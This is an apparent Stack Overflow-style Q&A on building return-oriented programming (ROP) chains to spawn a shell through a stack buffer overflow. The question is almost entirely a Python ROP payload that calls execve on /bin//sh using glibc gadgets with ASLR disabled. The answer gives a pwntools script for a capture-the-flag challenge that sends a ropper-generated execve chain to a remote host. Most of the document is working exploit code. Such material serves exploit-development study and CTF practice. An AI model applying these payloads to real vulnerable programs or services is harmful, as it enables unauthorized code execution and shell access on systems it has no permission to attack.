# How to make ROP gadget for shell to work?

Tags: c, exec, buffer-overflow

I have the below ROP gaget to execv shell.

```
from struct import pack
p = "\x90"+"a"*71
p += pack('<Q', 0x0000000000001b96+0x007ffff79e4000) # pop rdx ; ret
p += pack('<Q', 0x00000000003eb1a0+0x007ffff79e4000) # @ .data
p += pack('<Q', 0x00000000000439c8+0x007ffff79e4000) # pop rax ; ret
p += '/bin//sh'
p += pack('<Q', 0x000000000003093c+0x007ffff79e4000) # mov qword ptr [rdx], rax ; ret
p += pack('<Q', 0x0000000000001b96+0x007ffff79e4000) # pop rdx ; ret
p += pack('<Q', 0x00000000003eb1a8+0x007ffff79e4000) # @ .data + 8
p += pack('<Q', 0x00000000000b17c5+0x007ffff79e4000) # xor rax, rax ; ret
p += pack('<Q', 0x000000000003093c+0x007ffff79e4000) # mov qword ptr [rdx], rax ; ret
p += pack('<Q', 0x000000000002155f+0x007ffff79e4000) # pop rdi ; ret
p += pack('<Q', 0x00000000003eb1a0+0x007ffff79e4000) # @ .data
p += pack('<Q', 0x0000000000023e6a+0x007ffff79e4000) # pop rsi ; ret
p += pack('<Q', 0x00000000003eb1a8+0x007ffff79e4000) # @ .data + 8
p += pack('<Q', 0x0000000000001b96+0x007ffff79e4000) # pop rdx ; ret
p += pack('<Q', 0x00000000003eb1a8+0x007ffff79e4000) # @ .data + 8
p += pack('<Q', 0x00000000000b17c5+0x007ffff79e4000) # xor rax, rax ; ret
p += pack('<Q', 0x00000000000d0e00+0x007ffff79e4000) # add rax, 1 ; ret
p += pack('<Q', 0x00000000000d0e00+0x007ffff79e4000) # add rax, 1 ; ret
p += pack('<Q', 0x00000000000d0e00+0x007ffff79e4000) # add rax, 1 ; ret
p += pack('<Q', 0x00000000000d0e00+0x007ffff79e4000) # add rax, 1 ; ret
p += pack('<Q', 0x00000000000d0e00+0x007ffff79e4000) # add rax, 1 ; ret
p += pack('<Q', 0x00000000000d0e00+0x007ffff79e4000) # add rax, 1 ; ret
p += pack('<Q', 0x00000000000d0e00+0x007ffff79e4000) # add rax, 1 ; ret
p += pack('<Q', 0x00000000000d0e00+0x007ffff79e4000) # add rax, 1 ; ret
p += pack('<Q', 0x00000000000d0e00+0x007ffff79e4000) # add rax, 1 ; ret
p += pack('<Q', 0x00000000000d0e00+0x007ffff79e4000) # add rax, 1 ; ret
p += pack('<Q', 0x00000000000d0e00+0x007ffff79e4000) # add rax, 1 ; ret
p += pack('<Q', 0x00000000000d0e00+0x007ffff79e4000) # add rax, 1 ; ret
p += pack('<Q', 0x00000000000d0e00+0x007ffff79e4000) # add rax, 1 ; ret
p += pack('<Q', 0x00000000000d0e00+0x007ffff79e4000) # add rax, 1 ; ret
p += pack('<Q', 0x00000000000d0e00+0x007ffff79e4000) # add rax, 1 ; ret
p += pack('<Q', 0x00000000000d0e00+0x007ffff79e4000) # add rax, 1 ; ret
p += pack('<Q', 0x00000000000d0e00+0x007ffff79e4000) # add rax, 1 ; ret
p += pack('<Q', 0x00000000000d0e00+0x007ffff79e4000) # add rax, 1 ; ret
p += pack('<Q', 0x00000000000d0e00+0x007ffff79e4000) # add rax, 1 ; ret
p += pack('<Q', 0x00000000000d0e00+0x007ffff79e4000) # add rax, 1 ; ret
p += pack('<Q', 0x00000000000d0e00+0x007ffff79e4000) # add rax, 1 ; ret
p += pack('<Q', 0x00000000000d0e00+0x007ffff79e4000) # add rax, 1 ; ret
p += pack('<Q', 0x00000000000d0e00+0x007ffff79e4000) # add rax, 1 ; ret
p += pack('<Q', 0x00000000000d0e00+0x007ffff79e4000) # add rax, 1 ; ret
p += pack('<Q', 0x00000000000d0e00+0x007ffff79e4000) # add rax, 1 ; ret
p += pack('<Q', 0x00000000000d0e00+0x007ffff79e4000) # add rax, 1 ; ret
p += pack('<Q', 0x00000000000d0e00+0x007ffff79e4000) # add rax, 1 ; ret
p += pack('<Q', 0x00000000000d0e00+0x007ffff79e4000) # add rax, 1 ; ret
p += pack('<Q', 0x00000000000d0e00+0x007ffff79e4000) # add rax, 1 ; ret
p += pack('<Q', 0x00000000000d0e00+0x007ffff79e4000) # add rax, 1 ; ret
p += pack('<Q', 0x00000000000d0e00+0x007ffff79e4000) # add rax, 1 ; ret
p += pack('<Q', 0x00000000000d0e00+0x007ffff79e4000) # add rax, 1 ; ret
p += pack('<Q', 0x00000000000d0e00+0x007ffff79e4000) # add rax, 1 ; ret
p += pack('<Q', 0x00000000000d0e00+0x007ffff79e4000) # add rax, 1 ; ret
p += pack('<Q', 0x00000000000d0e00+0x007ffff79e4000) # add rax, 1 ; ret
p += pack('<Q', 0x00000000000d0e00+0x007ffff79e4000) # add rax, 1 ; ret
p += pack('<Q', 0x00000000000d0e00+0x007ffff79e4000) # add rax, 1 ; ret
p += pack('<Q', 0x00000000000d0e00+0x007ffff79e4000) # add rax, 1 ; ret
p += pack('<Q', 0x00000000000d0e00+0x007ffff79e4000) # add rax, 1 ; ret
p += pack('<Q', 0x00000000000d0e00+0x007ffff79e4000) # add rax, 1 ; ret
p += pack('<Q', 0x00000000000d0e00+0x007ffff79e4000) # add rax, 1 ; ret
p += pack('<Q', 0x00000000000d0e00+0x007ffff79e4000) # add rax, 1 ; ret
p += pack('<Q', 0x00000000000d0e00+0x007ffff79e4000) # add rax, 1 ; ret
p += pack('<Q', 0x00000000000d0e00+0x007ffff79e4000) # add rax, 1 ; ret
p += pack('<Q', 0x00000000000d0e00+0x007ffff79e4000) # add rax, 1 ; ret
p += pack('<Q', 0x00000000000d0e00+0x007ffff79e4000) # add rax, 1 ; ret
p += pack('<Q', 0x00000000000d0e00+0x007ffff79e4000) # add rax, 1 ; ret
p += pack('<Q', 0x00000000000d0e00+0x007ffff79e4000) # add rax, 1 ; ret
p += pack('<Q', 0x00000000000d0e00+0x007ffff79e4000) # add rax, 1 ; ret
p += pack('<Q', 0x00000000000d0e00+0x007ffff79e4000) # add rax, 1 ; ret
p += pack('<Q', 0x00000000000d0e00+0x007ffff79e4000) # add rax, 1 ; ret
p += pack('<Q', 0x00000000000d0e00+0x007ffff79e4000) # add rax, 1 ; ret
p += pack('<Q', 0x00000000000d0e00+0x007ffff79e4000) # add rax, 1 ; ret
p += pack('<Q', 0x00000000000d0e00+0x007ffff79e4000) # add rax, 1 ; ret
p += pack('<Q', 0x00000000000d0e00+0x007ffff79e4000) # add rax, 1 ; ret
p += pack('<Q', 0x00000000000d0e00+0x007ffff79e4000) # add rax, 1 ; ret
p += pack('<Q', 0x00000000000d0e00+0x007ffff79e4000) # add rax, 1 ; ret
p += pack('<Q', 0x00000000000d0e00+0x007ffff79e4000) # add rax, 1 ; ret
p += pack('<Q', 0x00000000000d0e00+0x007ffff79e4000) # add rax, 1 ; ret
p += pack('<Q', 0x00000000000013c0+0x007ffff79e4000) # syscall

print(p)
```

The program runs and exits successfully. But there wont be any shell gets prompted. I get the following message when run from GDB.
'''
process 3928 is executing new program: /bin/dash
[Inferior 1 (process 3928) exited normally]
'''

I checked if the process is execving shell and I'm able to see process 'sh' running during the program debug. Bu at the end it somehow terminates.
When run from terminal, I don't get any process exit message.
I need to launch shell by overflowing the buffer.
PS: I have ASLR disabled.

Answer (score 0):

You can combine with [pwntools](https://github.com/Gallopsled/pwntools), This is example exploit script I wrote for solving CTF challenge :

```
#!/usr/bin/env python
# Generated by ropper ropchain generator #
from pwn import *
from struct import pack

s = remote("hack.bckdr.in", "15102")
#s = process("qemu-x86_64 ./chall2")
p = lambda x : pack('Q', x)

IMAGE_BASE_0 = 0x0000000000400000 # 4a6888bf50a5cfc75ea51ec172dfee08ef6d82e3a9fdbea556ef9cd86dd51c6a
rebase_0 = lambda x : p(x + IMAGE_BASE_0)

rop = ''

rop += rebase_0(0x0000000000001a1f) # 0x0000000000401a1f: pop r13; ret; 
rop += '//bin/sh'
rop += rebase_0(0x00000000000016c3) # 0x00000000004016c3: pop rdi; ret; 
rop += rebase_0(0x00000000002c0060)
rop += rebase_0(0x0000000000050c95) # 0x0000000000450c95: mov qword ptr [rdi], r13; pop rbx; pop rbp; pop r12; pop r13; ret; 
rop += p(0xdeadbeefdeadbeef)
rop += p(0xdeadbeefdeadbeef)
rop += p(0xdeadbeefdeadbeef)
rop += p(0xdeadbeefdeadbeef)
rop += rebase_0(0x0000000000001a1f) # 0x0000000000401a1f: pop r13; ret; 
rop += p(0x0000000000000000)
rop += rebase_0(0x00000000000016c3) # 0x00000000004016c3: pop rdi; ret; 
rop += rebase_0(0x00000000002c0068)
rop += rebase_0(0x0000000000050c95) # 0x0000000000450c95: mov qword ptr [rdi], r13; pop rbx; pop rbp; pop r12; pop r13; ret; 
rop += p(0xdeadbeefdeadbeef)
rop += p(0xdeadbeefdeadbeef)
rop += p(0xdeadbeefdeadbeef)
rop += p(0xdeadbeefdeadbeef)
rop += rebase_0(0x00000000000016c3) # 0x00000000004016c3: pop rdi; ret; 
rop += rebase_0(0x00000000002c0060)
rop += rebase_0(0x00000000000017d7) # 0x00000000004017d7: pop rsi; ret; 
rop += rebase_0(0x00000000002c0068)
rop += rebase_0(0x00000000000377d5) # 0x00000000004377d5: pop rdx; ret; 
rop += rebase_0(0x00000000002c0068)
rop += rebase_0(0x000000000006b9f8) # 0x000000000046b9f8: pop rax; ret; 
rop += p(0x000000000000003b)
rop += rebase_0(0x000000000005bac5) # 0x000000000045bac5: syscall; ret; 
#print rop

payload = "A" * 40 + rop + "\n"

s.sendline(payload)
#s.interactive() # or with interactive ?
```